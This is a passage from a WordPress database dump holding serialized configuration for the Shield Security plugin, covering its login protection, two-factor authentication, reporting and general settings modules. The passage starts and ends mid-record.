pages.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:17:\"section_2fa_email\";s:5:\"title\";s:31:\"Email Two-Factor Authentication\";s:11:\"title_short\";s:11:\"2FA - Email\";s:7:\"summary\";a:3:{i:0;s:102:\"Purpose - Verifies the identity of users who log in to your site using email-based one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:2;a:4:{s:4:\"slug\";s:14:\"section_2fa_ga\";s:5:\"title\";s:46:\"Google Authenticator Two-Factor Authentication\";s:11:\"title_short\";s:26:\"2FA - Google Authenticator\";s:7:\"summary\";a:3:{i:0;s:111:\"Purpose - Verifies the identity of users who log in to your site using Google Authenticator one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:3;a:4:{s:4:\"slug\";s:31:\"section_hardware_authentication\";s:5:\"title\";s:32:\"Hardware 2-Factor Authentication\";s:11:\"title_short\";s:14:\"2FA - Hardware\";s:7:\"summary\";a:2:{i:0;s:98:\"Purpose - Verifies the identity of users who log in to your site using Yubikey one-time-passwords.\";i:1;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:4;a:4:{s:4:\"slug\";s:34:\"section_multifactor_authentication\";s:5:\"title\";s:27:\"Multi-Factor Authentication\";s:11:\"title_short\";s:13:\"2-Factor Auth\";s:7:\"summary\";a:3:{i:0;s:103:\"Purpose - Verifies the identity of users who log in to your site - i.e. they are who they say they are.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:5;a:4:{s:4:\"slug\";s:22:\"section_rename_wplogin\";s:5:\"title\";s:18:\"Hide WP Login Page\";s:11:\"title_short\";s:15:\"Hide Login Page\";s:7:\"summary\";a:2:{i:0;s:142:\"Purpose - To hide your wp-login.php page from brute force attacks and hacking attempts - if your login page cannot be found, no-one can login.\";i:1;s:145:\"Recommendation - This is not required for complete security and if your site has irregular or inconsistent configuration it may not work for you.\";}}i:6;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:13:\"User Messages\";s:11:\"title_short\";s:13:\"User Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:7;a:4:{s:4:\"slug\";s:46:\"section_enable_plugin_feature_login_protection\";s:5:\"title\";s:26:\"Disable Login Guard Module\";s:11:\"title_short\";s:7:\"Disable\";s:7:\"summary\";a:2:{i:0;s:91:\"Purpose - Login Guard blocks all automated and brute force attempts to log in to your site.\";i:1;s:55:\"Recommendation - Keep the Login Guard module turned on.\";}}i:8;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:23:{i:0;a:10:{s:3:\"key\";s:20:\"enable_login_protect\";s:7:\"section\";s:46:\"section_enable_plugin_feature_login_protection\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/51\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf03\";s:4:\"name\";s:18:\"Enable Login Guard\";s:7:\"summary\";s:42:\"Enable (or Disable) The Login Guard Module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Login Guard module\";}i:1;a:11:{s:3:\"key\";s:19:\"rename_wplogin_path\";s:7:\"section\";s:22:\"section_rename_wplogin\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/5q\";s:9:\"link_blog\";s:19:\"https://shsec.io/5r\";s:4:\"name\";s:15:\"Hide Login Page\";s:7:\"summary\";s:31:\"Rename The WordPress Login Page\";s:11:\"description\";s:101:\"Creating a path here will disable your \'wp-login.php\'. Only letters and numbers are permitted: abc123\";}i:2;a:9:{s:3:\"key\";s:29:\"enable_chained_authentication\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/9r\";s:9:\"link_blog\";s:19:\"https://shsec.io/84\";s:4:\"name\";s:27:\"Multi-Factor Authentication\";s:7:\"summary\";s:41:\"Require All Active Authentication Factors\";s:11:\"description\";s:123:\"When enabled, all multi-factor authentication methods will be applied to a user login. Disable to only require one to pass.\";}i:3;a:11:{s:3:\"key\";s:8:\"mfa_skip\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/b1\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Multi-Factor Bypass\";s:7:\"summary\";s:78:\"A User Can Bypass Multi-Factor Authentication (MFA) For The Set Number Of Days\";s:11:\"description\";s:97:\"Enter the number of days a user can bypass future MFA after a successful MFA-login. 0 to disable.\";}i:4;a:10:{s:3:\"key\";s:17:\"allow_backupcodes\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dx\";s:9:\"link_blog\";s:19:\"https://shsec.io/dy\";s:4:\"name\";s:18:\"Allow Backup Codes\";s:7:\"summary\";s:37:\"Allow Users To Generate A Backup Code\";s:11:\"description\";s:95:\"Allow users to generate a backup code that can be used to login if MFA factors are unavailable.\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_google_authenticator\";s:7:\"section\";s:14:\"section_2fa_ga\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://shsec.io/shld7\";s:9:\"link_blog\";s:22:\"https://shsec.io/shld6\";s:4:\"name\";s:27:\"Enable Google Authenticator\";s:7:\"summary\";s:39:\"Allow Users To Use Google Authenticator\";s:11:\"description\";s:101:\"When enabled, users will have the option to add Google Authenticator to their WordPress user profile.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_email_authentication\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3t\";s:9:\"link_blog\";s:19:\"https://shsec.io/9q\";s:4:\"name\";s:27:\"Enable Email Authentication\";s:7:\"summary\";s:40:\"Two-Factor Login Authentication By Email\";s:11:\"description\";s:90:\"All users will be required to verify their login by email-based two-factor authentication.\";}i:7;a:11:{s:3:\"key\";s:26:\"two_factor_auth_user_roles\";s:7:\"section\";s:17:\"section_2fa_email\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:11:\"contributor\";i:1;s:6:\"author\";i:2;s:6:\"editor\";i:3;s:13:\"administrator\";}s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"subscriber\";s:4:\"text\";s:11:\"Subscribers\";}i:1;a:2:{s:9:\"value_key\";s:11:\"contributor\";s:4:\"text\";s:12:\"Contributors\";}i:2;a:2:{s:9:\"value_key\";s:6:\"author\";s:4:\"text\";s:7:\"Authors\";}i:3;a:2:{s:9:\"value_key\";s:6:\"editor\";s:4:\"text\";s:7:\"Editors\";}i:4;a:2:{s:9:\"value_key\";s:13:\"administrator\";s:4:\"text\";s:14:\"Administrators\";}i:5;a:2:{s:9:\"value_key\";s:8:\"customer\";s:4:\"text\";s:14:\"[Woo] Customer\";}i:6;a:2:{s:9:\"value_key\";s:12:\"shop_manager\";s:4:\"text\";s:22:\"[Woo/EDD] Shop Manager\";}i:7;a:2:{s:9:\"value_key\";s:15:\"shop_accountant\";s:4:\"text\";s:21:\"[EDD] Shop Accountant\";}i:8;a:2:{s:9:\"value_key\";s:11:\"shop_worker\";s:4:\"text\";s:17:\"[EDD] Shop Worker\";}i:9;a:2:{s:9:\"value_key\";s:14:\"edd_subscriber\";s:4:\"text\";s:14:\"[EDD] Customer\";}}s:9:\"link_info\";s:19:\"https://shsec.io/4v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Enforce - Email Authentication\";s:7:\"summary\";s:46:\"All User Roles Subject To Email Authentication\";s:11:\"description\";s:130:\"Enforces email-based authentication on all users with the selected roles. Note: This setting only applies to email authentication.\";}i:8;a:10:{s:3:\"key\";s:18:\"email_any_user_set\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gj\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Allow Any User\";s:7:\"summary\";s:60:\"Allow Any User To Turn-On Two-Factor Authentication By Email\";s:11:\"description\";s:61:\"Allow Any User To Turn-On Two-Factor Authentication By Email.\";}i:9;a:10:{s:3:\"key\";s:24:\"bot_protection_locations\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:5:\"login\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:5:\"login\";s:4:\"text\";s:5:\"Login\";}i:1;a:2:{s:9:\"value_key\";s:8:\"register\";s:4:\"text\";s:8:\"Register\";}i:2;a:2:{s:9:\"value_key\";s:8:\"password\";s:4:\"text\";s:13:\"Lost Password\";}i:3;a:2:{s:9:\"value_key\";s:12:\"checkout_woo\";s:4:\"text\";s:22:\"Checkout (WooCommerce)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dv\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Protection Locations\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:64:\"Choose for which forms bot protection measures will be deployed.\";}i:10;a:10:{s:3:\"key\";s:20:\"login_limit_interval\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:2:\"10\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3q\";s:9:\"link_blog\";s:19:\"https://shsec.io/9o\";s:4:\"name\";s:23:\"Login Cooldown Interval\";s:7:\"summary\";s:39:\"Limit login attempts to every X seconds\";s:11:\"description\";s:109:\"WordPress will process only ONE login attempt for every number of seconds specified. Zero (0) turns this off.\";}i:11;a:9:{s:3:\"key\";s:23:\"enable_login_gasp_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3r\";s:9:\"link_blog\";s:19:\"https://shsec.io/9n\";s:4:\"name\";s:14:\"Bot Protection\";s:7:\"summary\";s:54:\"Protect WP Login From Automated Login Attempts By Bots\";s:11:\"description\";s:138:\"Adds a dynamically (Javascript) generated checkbox to the login form that prevents bots using automated login techniques. Recommended: ON.\";}i:12;a:10:{s:3:\"key\";s:29:\"enable_google_recaptcha_login\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9m\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:14:\"Enable CAPTCHA\";s:11:\"description\";s:32:\"Use CAPTCHA on the login screen.\";}i:13;a:11:{s:3:\"key\";s:16:\"antibot_form_ids\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:2:{i:0;s:19:\"form#ihc_login_form\";i:1;s:15:\"form#createuser\";}s:9:\"link_info\";s:19:\"https://shsec.io/hg\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"AntiBot Forms\";s:7:\"summary\";s:66:\"Enter The IDs Of The 3rd Party Login Forms For Use With AntiBot JS\";s:11:\"description\";s:32:\"For Use With AnitBot JS (above).\";}i:14;a:10:{s:3:\"key\";s:10:\"enable_u2f\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Allow U2F\";s:7:\"summary\";s:33:\"Allow Registration Of U2F Devices\";s:11:\"description\";s:34:\"Allow Registration Of U2F Devices.\";}i:15;a:9:{s:3:\"key\";s:14:\"enable_yubikey\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4f\";s:9:\"link_blog\";s:19:\"https://shsec.io/9t\";s:4:\"name\";s:17:\"Allow Yubikey OTP\";s:7:\"summary\";s:49:\"Allow Yubikey Registration For One Time Passwords\";s:11:\"description\";s:99:\"Combined with your Yubikey API Key (below) this will form the basis of your Yubikey Authentication.\";}i:16;a:10:{s:3:\"key\";s:14:\"yubikey_app_id\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Yubikey App ID\";s:7:\"summary\";s:26:\"Your Unique Yubikey App ID\";s:11:\"description\";s:91:\"Combined with your Yubikey API Key this will form the basis of your Yubikey Authentication.\";}i:17;a:10:{s:3:\"key\";s:15:\"yubikey_api_key\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Yubikey API Key\";s:7:\"summary\";s:31:\"Your Unique Yubikey App API Key\";s:11:\"description\";s:90:\"Combined with your Yubikey App ID this will form the basis of your Yubikey Authentication.\";}i:18;a:11:{s:3:\"key\";s:13:\"text_imahuman\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"GASP Checkbox Text\";s:7:\"summary\";s:47:\"The Message Displayed Next To The GASP Checkbox\";s:11:\"description\";s:99:\"You can change the text displayed to the user beside the checkbox if you need a customized message.\";}i:19;a:11:{s:3:\"key\";s:19:\"text_pleasecheckbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"GASP Alert Text\";s:7:\"summary\";s:55:\"The Message Displayed If The User Doesn\'t Check The Box\";s:11:\"description\";s:95:\"You can change the text displayed to the user in the alert message if they don\'t check the box.\";}i:20;a:6:{s:3:\"key\";s:26:\"email_can_send_verified_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:21;a:6:{s:3:\"key\";s:8:\"gasp_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:22;a:5:{s:3:\"key\";s:21:\"use_login_intent_page\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:5:\"value\";b:1;}}s:11:\"definitions\";a:2:{s:20:\"login_intent_timeout\";i:5;s:6:\"events\";a:16:{s:23:\"2fa_backupcode_verified\";a:0:{}s:19:\"2fa_backupcode_fail\";a:1:{s:7:\"offense\";b:1;}s:18:\"2fa_email_verified\";a:0:{}s:21:\"2fa_email_verify_fail\";a:1:{s:7:\"offense\";b:1;}s:23:\"2fa_googleauth_verified\";a:0:{}s:15:\"2fa_google_fail\";a:1:{s:7:\"offense\";b:1;}s:20:\"2fa_yubikey_verified\";a:0:{}s:16:\"2fa_yubikey_fail\";a:1:{s:7:\"offense\";b:1;}s:22:\"2fa_email_send_success\";a:0:{}s:19:\"2fa_email_send_fail\";a:0:{}s:13:\"cooldown_fail\";a:0:{}s:13:\"honeypot_fail\";a:0:{}s:11:\"botbox_fail\";a:0:{}s:11:\"login_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:14:\"hide_login_url\";a:1:{s:5:\"audit\";b:0;}s:11:\"2fa_success\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(429643,'shield_mod_config_2bc2605d76db96d0ed3a050dea0907d9','a:5:{s:10:\"properties\";a:13:{s:4:\"slug\";s:9:\"reporting\";s:4:\"name\";s:9:\"Reporting\";s:11:\"storage_key\";s:9:\"reporting\";s:7:\"tagline\";s:16:\"Shield Reporting\";s:12:\"show_central\";b:1;s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:8:\"sections\";a:3:{i:0;a:5:{s:4:\"slug\";s:15:\"section_timings\";s:7:\"primary\";b:1;s:5:\"title\";s:18:\"Report Frequencies\";s:11:\"title_short\";s:18:\"Report Frequencies\";s:7:\"summary\";a:1:{i:0;s:105:\"Purpose - Choose the most appropriate frequency to receive alerts from Shield according to your schedule.\";}}i:1;a:4:{s:4:\"slug\";s:28:\"section_enable_mod_reporting\";s:5:\"title\";s:22:\"Enable Module: Reports\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:54:\"Recommendation - Keep the Reporting feature turned on.\";}}i:2;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:3:{i:0;a:10:{s:3:\"key\";s:16:\"enable_reporting\";s:7:\"section\";s:28:\"section_enable_mod_reporting\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hb\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Enable Reporting\";s:7:\"summary\";s:40:\"Enable (or Disable) The Reporting module\";s:11:\"description\";s:68:\"Un-Checking this option will completely disable the Reporting module\";}i:1;a:10:{s:3:\"key\";s:15:\"frequency_alert\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:5:\"daily\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Alert Frequency\";s:7:\"summary\";s:45:\"How Often Should You Be Sent Important Alerts\";s:11:\"description\";s:86:\"Decide when you should be sent important and critical alerts about your site security.\";}i:2;a:10:{s:3:\"key\";s:14:\"frequency_info\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:6:\"weekly\";s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}i:4;a:2:{s:9:\"value_key\";s:8:\"biweekly\";s:4:\"text\";s:9:\"Bi-Weekly\";}i:5;a:2:{s:9:\"value_key\";s:7:\"monthly\";s:4:\"text\";s:7:\"Monthly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/ha\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Info Frequency\";s:7:\"summary\";s:48:\"How Often Should You Be Sent Information Reports\";s:11:\"description\";s:93:\"Decide when you should be sent non-critical information and reports about your site security.\";}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"reports\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Reports\\Handler\";}s:18:\"reports_table_name\";s:7:\"reports\";s:21:\"reports_table_columns\";a:5:{s:3:\"rid\";s:55:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Report ID\'\";s:4:\"type\";s:52:\"varchar(3) NOT NULL DEFAULT \'\' COMMENT \'Report Type\'\";s:9:\"frequency\";s:67:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Report Interval/Frequency\'\";s:15:\"interval_end_at\";s:67:\"int(15) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'TS of end of interval\'\";s:7:\"sent_at\";s:35:\"int(15) UNSIGNED NOT NULL DEFAULT 0\";}s:31:\"reports_table_timestamp_columns\";a:2:{s:15:\"interval_end_at\";s:22:\"Reporting Interval End\";s:7:\"sent_at\";s:11:\"Report Sent\";}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420375,'shield_mod_config_fefc8687bc08707a1b4dd5fce08bbd83','a:6:{s:10:\"properties\";a:16:{s:4:\"slug\";s:6:\"plugin\";s:4:\"name\";s:16:\"General Settings\";s:12:\"sidebar_name\";s:7:\"General\";s:10:\"menu_title\";s:8:\"Settings\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:6:\"plugin\";s:7:\"tagline\";s:23:\"General Plugin Settings\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:10;}s:13:\"admin_notices\";a:10:{s:14:\"plugin-too-old\";a:6:{s:2:\"id\";s:14:\"plugin-too-old\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:5:\"error\";}s:17:\"override-forceoff\";a:6:{s:2:\"id\";s:17:\"override-forceoff\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:15:\"plugin-disabled\";a:6:{s:2:\"id\";s:15:\"plugin-disabled\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:16:\"update-available\";a:6:{s:2:\"id\";s:16:\"update-available\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:4:\"php7\";a:6:{s:2:\"id\";s:4:\"php7\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:1;s:4:\"type\";s:7:\"warning\";}s:17:\"compat-sgoptimize\";a:7:{s:2:\"id\";s:17:\"compat-sgoptimize\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:12:\"plugin_admin\";s:6:\"ignore\";s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";}s:14:\"wizard_welcome\";a:3:{s:2:\"id\";s:14:\"wizard_welcome\";s:8:\"per_user\";b:0;s:4:\"type\";s:4:\"info\";}s:26:\"plugin-mailing-list-signup\";a:4:{s:2:\"id\";s:26:\"plugin-mailing-list-signup\";s:16:\"min_install_days\";i:5;s:4:\"type\";s:5:\"promo\";s:12:\"drip_form_id\";s:9:\"250437573\";}s:14:\"allow-tracking\";a:4:{s:2:\"id\";s:14:\"allow-tracking\";s:12:\"plugin_admin\";b:1;s:16:\"min_install_days\";i:3;s:4:\"type\";s:5:\"promo\";}s:11:\"rate-plugin\";a:3:{s:2:\"id\";s:11:\"rate-plugin\";s:16:\"min_install_days\";i:30;s:4:\"type\";s:5:\"promo\";}}s:8:\"sections\";a:7:{i:0;a:5:{s:4:\"slug\";s:16:\"section_defaults\";s:7:\"primary\";b:1;s:5:\"title\";s:15:\"Plugin Defaults\";s:11:\"title_short\";s:15:\"Plugin Defaults\";s:13:\"help_video_id\";s:9:\"338533495\";}i:1;a:4:{s:4:\"slug\";s:30:\"section_general_plugin_options\";s:5:\"title\";s:22:\"General Plugin Options\";s:11:\"title_short\";s:15:\"General Options\";s:13:\"help_video_id\";s:9:\"338540386\";}i:2;a:4:{s:4:\"slug\";s:27:\"section_third_party_captcha\";s:5:\"title\";s:7:\"CAPTCHA\";s:11:\"title_short\";s:7:\"CAPTCHA\";s:13:\"help_video_id\";s:9:\"338546796\";}i:3;a:3:{s:4:\"slug\";s:20:\"section_importexport\";s:5:\"title\";s:15:\"Import / Export\";s:11:\"title_short\";s:15:\"Import / Export\";}i:4;a:3:{s:4:\"slug\";s:20:\"section_integrations\";s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";}i:5;a:3:{s:4:\"slug\";s:31:\"section_global_security_options\";s:5:\"title\";s:30:\"Global Plugin Security Options\";s:11:\"title_short\";s:14:\"Disable Shield\";}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:32:{i:0;a:9:{s:3:\"key\";s:29:\"global_enable_plugin_features\";s:7:\"section\";s:31:\"section_global_security_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:33:\"Enable/Disable All Plugin Modules\";s:7:\"summary\";s:27:\"Global Plugin On/Off Switch\";s:11:\"description\";s:50:\"Uncheck this option to disable all Shield features\";}i:1;a:9:{s:3:\"key\";s:15:\"enable_tracking\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7i\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:28:\"Enable Information Gathering\";s:7:\"summary\";s:44:\"Permit Anonymous Usage Information Gathering\";s:11:\"description\";s:198:\"Allows us to gather information on statistics and features in-use across our client installations. This information is strictly anonymous and contains no personally, or otherwise, identifiable data.\";}i:2;a:9:{s:3:\"key\";s:13:\"show_advanced\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Show All Options\";s:7:\"summary\";s:51:\"Show All Options Including Those Marked As Advanced\";s:11:\"description\";s:122:\"Shield hides advanced options from view to simplify display. Turn this option on to display advanced options at all times.\";}i:3;a:12:{s:3:\"key\";s:22:\"visitor_address_source\";s:7:\"section\";s:16:\"section_defaults\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:14:\"AUTO_DETECT_IP\";s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:14:\"AUTO_DETECT_IP\";s:4:\"text\";s:31:\"Automatically Detect Visitor 